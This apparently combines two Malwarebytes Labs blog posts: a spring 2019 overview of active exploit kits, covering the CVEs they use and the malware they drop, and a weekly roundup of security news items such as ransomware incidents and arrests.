According to our telemetry, the US is by far the country most affected by exploit kits, while Spain and South Korea are leading in Europe and Asia, respectively.

Spring 2019 overview

  • Spelevo EK
  • Fallout EK
  • Magnitude EK
  • RIG EK
  • Underminer EK
  • Router EK


Internet Explorer’s CVE-2018-8174 and Flash Player’s CVE-2018-15982 are the most common vulnerabilities, while the older CVE-2018-4878 (Flash) is still used by some EKs.

Spelevo EK

Spelevo EK is a new exploit kit that was identified in March 2019 and features the most recent Flash exploit (CVE-2018-15982). Based on our internal tests, Spelevo’s Flash exploit will check for and avoid virtual machines before delivering its payload.

Payloads seen: PsiX Bot, IcedID

Fallout EK

Fallout EK is one of the more active exploit kits with some of the more intricate URI patterns. For a while, Fallout was loading its IE exploit via a GitHub PoC, but it eventually switched back to self-hosting.

Payloads seen: GandCrab, Raccoon Stealer, Baldr

Magnitude EK

Not a lot has changed for Magnitude EK during the past few months, as it continues to target a few Asia Pacific (APAC) countries, and exclusively drops its own Magniber ransomware.

Payload seen: Magniber ransomware


RIG EK is also one of the popular exploit kits enjoying a wide distribution via malvertising campaigns, such as Fobos. RIG still uses Flash’s CVE-2018-4878, which comes with its own artifacts.

Payloads seen: AZORult, Pitou, ElectrumDoSMiner

Underminer EK

Underminer EK is distinct from its counterparts for its overkill obfuscation of Internet Explorer and Flash exploits, but more importantly for its unorthodox Hidden Bee payload.

Payload seen: Hidden Bee

Router EK

Router exploit kits are not new (see DNSChanger EK), but they are quite dangerous, as they are part of drive-by attacks that alter your router’s DNS settings via cross-site request forgery (CSRF). The particular one we show here (Novidade) targets Brazilian users. The end goal is typically to redirect users to phishing websites with victims being none the wiser.

Payload seen: DNS changer


Malwarebytes users are protected against these exploits kits, thanks to our anti-exploit and web protection technologies. The animation below features Malwarebytes Endpoint Protection and Response, one of our business products, and shows how it blocks each of these attacks.

The post Exploit kits: spring 2019 review appeared first on Malwarebytes Labs.

A week in security (May 6 – 12)

Last week on Labs, we discussed what to do when you discover a data breach, how 5G could impact cybersecurity strategy, the top six takeaways for user privacy, vulnerabilities in financial mobile apps that put consumers and businesses at risk, and in our series about vital infrastructure, we highlighted threats that target financial institutions, fintech, and cryptocurrencies.

Other cybersecurity news

  • Mozilla announced their new add-on policies, which will go into effect June 10, 2019. The emphasis is that add-ons inform users about their intentions, and are not allowed to contain obfuscated code. (Source: Mozilla)
  • The FBI, working in conjunction with authorities in multiple nations, has arrested several individuals in connection with Deep Dot Web, a website that allegedly profiteered by taking commissions on referral links to dark web markets. (Source: Gizmodo)
  • An international malvertiser was extradited from the Netherlands to face hacking charges in New Jersey. The defendant conspired to expose millions of web users to malicious advertisements designed to hack and infect victims’ computers with malware. (Source: US Department of Justice)
  • In an attempt to allow users to block online tracking, Google has announced two new features—Improved SameSite Cookies and Fingerprinting Protection—that will be previewed by Google in the Chrome web browser later this year. (Source: The Hacker News)
  • A slew of high-severity flaws have been disclosed in the PrinterLogic printer management service, which could enable a remote attacker to execute code on workstations running the PrinterLogic agent. (Source: ThreatPost)
  • On Monday, May 6, accounting firm Wolters Kluwer started seeing technical anomalies in a number of their platforms and applications. After investigating, they discovered the installation of malware. As a precaution, they decided to take a broader range of platforms and applications offline. (Source: Wolters Kluwer)
  • After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency. (Source: Bleeping Computer)
  • The FBI is investigating a ransomware attack on Baltimore City’s network that shut down some of the city services. (Source: CBS Baltimore)
  • The Dharma ransomware tries to divert victim’s attention by using an old ESET tool. While the user is dealing with the installation of the ESET Remover, Dharma runs in the background. (Source: TechNadu)
  • The FBI and Department Homeland Security have jointly issued a new Malware Analysis Report warning of the dangers of ELECTRICFISH, a tunneling tool used for traffic funneling and data exfiltration by a North Korea government hacking group. (Source: SCMagazine)

Stay safe, everyone!

The post A week in security (May 6 – 12) appeared first on Malwarebytes Labs.